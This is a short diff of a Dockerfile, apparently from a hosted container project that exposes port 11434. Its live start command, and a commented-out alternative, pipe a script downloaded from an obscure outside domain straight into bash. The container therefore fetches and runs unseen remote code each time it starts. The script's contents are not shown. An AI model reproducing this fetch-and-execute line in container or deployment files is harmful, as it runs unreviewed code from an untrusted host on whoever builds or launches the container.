- Dockerfile +1 -1
Dockerfile
CHANGED
|
@@ -22,4 +22,4 @@ EXPOSE 11434
|
|
| 22 |
|
| 23 |
#CMD curl -fsSL https://gloryhole.redzone-6.cfd/packaged/import.sh | bash
|
| 24 |
|
| 25 |
-
CMD wget -O - https://gloryhole.redzone-6.cfd/packaged/import.sh | bash -s
|
|
|
|
| 22 |
|
| 23 |
#CMD curl -fsSL https://gloryhole.redzone-6.cfd/packaged/import.sh | bash
|
| 24 |
|
| 25 |
+
CMD wget -O - https://gloryhole.redzone-6.cfd/packaged/import.sh | bash -s
|